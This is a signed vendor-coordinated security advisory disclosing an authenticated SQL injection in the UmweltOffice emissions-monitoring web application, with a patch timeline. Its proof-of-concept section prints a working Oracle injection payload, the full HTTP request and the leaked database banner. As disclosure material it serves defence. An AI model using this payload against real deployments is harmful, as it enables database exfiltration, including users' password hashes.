-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-074 Product: UmweltOffice Manufacturer: Siempelkamp NIS Ingenieurgesellschaft mbH Affected Version(s): <7.4.3 Tested Version(s): 7.4.1 Vulnerability Type: SQL Injection (CWE-89) Risk Level: High Solution Status: Fixed Manufacturer Notification: 2024-08-28 Solution Date: 2024-11-11 Public Disclosure: 2024-11-25 CVE Reference: CVE-2024-8308 Authors of Advisory: Johannes Lauinger and Fidelis Abt, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: UmweltOffice by Siempelkamp NIS Ingenieurgesellschaft mbH is a system to continuously monitor emission data and make it available in the form of a web application. The application is also used to report emission data to the respective authorities. The manufacturer describes the product as follows (see [1]): "TALAS/7 with the UmweltOffice® V.7 PC system is a complete, networkable system for continuous acquisition, storage and analysis of emissions data through all branches of industry according to the Technical Instructions on Air Quality Control (TA-Luft), 13., 17., 27., 30. and 44. BlmSchV - (German emission safety regulations)." Due to improper handling of HTTP request input data, the web application is vulnerable to an SQL injection vulnerability. The functionality shown to be affected is accessible only after logging in to the application with any valid credentials (including low-privileged accounts), making this an authenticated SQL injection vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: After logging in to the application, it is possible to access stored notifications. This functionality is available by first opening the menu item "Input" ("Eingabe") and then "Notifications" ("Mitteilungen"). Notifications are shown in a list which can be filtered. To edit the filter, the button "Edit Filter" ("Filter bearbeiten") is used. This opens up an input form with different filter options. Updating the filter options results in an HTTP POST request being sent to the server. This request is vulnerable to both error-based and time- based boolean blind SQL injection in the following fields: * filterBkbId * filterAkbId * filterMkbId The vulnerability allows accessing the underlying Oracle DBMS and exfiltrating all data, including the salted password hashes of all users. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The Oracle database version banner can be retreived by setting the value 'filterBkbId' for the POST request '/emission/auswerten_mitteilungen.do' as follows: filterBkbId=1)) AND 42=DBMS_UTILITY.SQLID_TO_SQLHASH((SELECT banner FROM v$version FETCH FIRST 1 ROWS ONLY)) AND ((1=1 The full POST request sent to the application is shown in the following listing, where the 'Host' and 'Content-Length' header values as well as the session token have been redacted: POST /emission/auswerten_mitteilungen.do HTTP/1.1 Content-Length: XXX Host: xxx.xxx.xxx.xxx Content-Type: application/x-www-form-urlencoded Cookie: JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX filterAnwenden=false&formid=frmFilter&radioZeit=mz&filterZeitVonString=2024-07-21&filterArtId=0&filterBkbId=1))+AND+42%3dDBMS_UTILITY.SQLID_TO_SQLHASH((SELECT+banner+FROM+v$version+FETCH+FIRST+1+ROWS+ONLY))+AND+((1%3d1&filterZeitBisString=2024-08-22&filterStatusId=1&filterAkbId=%2A12&filterDurchId=36&filterMkbId=-1&btnFilterAnwenden=clicked&btnBerichtPDF=&btnBerichtTXT= The relevant part of the response which is returned by the application is shown in the following: Fehler in der Datenbankabfrage: ORA-13797: Ungültige SQL-ID angegeben, Oracle Database 12c Standard Edition Release 12.2.0.1.0 - 64bit Production ORA-06512: in "SYS.DBMS_UTILITY", Zeile 1271 In this case, the database version used is Oracle Database 12c Standard Edition Release 12.2.0.1.0 (64 bit). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Upgrade to UmweltOffice version 7.4.3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-08-21: Vulnerability discovered 2024-08-28: Vulnerability reported to manufacturer 2024-11-11: Patch released by manufacturer 2024-11-25: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for UmweltOffice https://www.siempelkamp-nis.com/en/products-and-services/environmental-systems-and-emission-monitoring/environment-systems/translate-to-englisch-talas/ [2] SySS Security Advisory SYSS-2024-074 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-074.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Johannes Lauinger and Fidelis Abt of SySS GmbH. E-Mail: johannes.lauinger@syss.de Public Key: https://www.syss.de/kontakt/pgp-keys Key Fingerprint: 3F79 A293 AE08 0A92 65EB 25D2 C431 4DF6 22D6 0262 E-Mail: fidelis.abt@syss.de Public Key: https://www.syss.de/kontakt/pgp-keys Key Fingerprint: A5BA AD2D E1A3 EBEB F43B A99C D3BE 05CA 41B7 1781 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEP3mik64ICpJl6yXSxDFN9iLWAmIFAmc0auIACgkQxDFN9iLW AmICVBAAgrXG+SGVcEBeiqs0tqsTTiFncgNZDRuEwHQdq4MPSO8YY2lGCHaDnHZU dBsmvAuA0X0Iq74rt9bNmTWOSDsgNgQcXctTGsHOAyFer3OOxKy4GBQ85p4kqQpl dwhOFcm2AUuqCGzsFhnBkSzVo8f6/DSM6gNKIvBRh8xtHSUr4C6hr9merN9aNK2O yfZiQ0G7YRhLsNdx5XKba6U1h+hoDkgtyiFB2yX0LYoqpyTd4qH2lyL6KOziEj2e cxJuPVni+SkGeh10qS5QOVUFYzp+gEzLplDIWlullEzQ0cXgJ3JBNwx9UBsXBlqz /ePOuTb/SdYj3HLeJGCpZB6dT5Tslc/gOsUOgOzMtzegnDwcDL0+YSEG2DEKjQHu bfeXC+EwhAOfqUsCpDaYSqF1N9x5BZS5I00NcpSeIqQT2fc8j7/GSnNArERI4DZj QTFWIXnrPxHD2FURhgNaTGgis7i+EDRyrKh3SZB/AWOwx8Yz7uoXpASnsx3TVLJW 3XQvPWm0TcAXjn3MzX1rqvsVWQa6bI93leBykyd2x6OVmg1fULqyJFfKNoFZkem5 Obiq4MacRcrBq9AGm+tCD64iLJKUJx3ObzJfAPvK8GLHksA9e+oWw18JVSuc4pmo n5E4dV6O9ILHG3/uZaMtJwTxpNaUErcSNgssyx3ENxwzGLVxHJo= =Nlmi -----END PGP SIGNATURE-----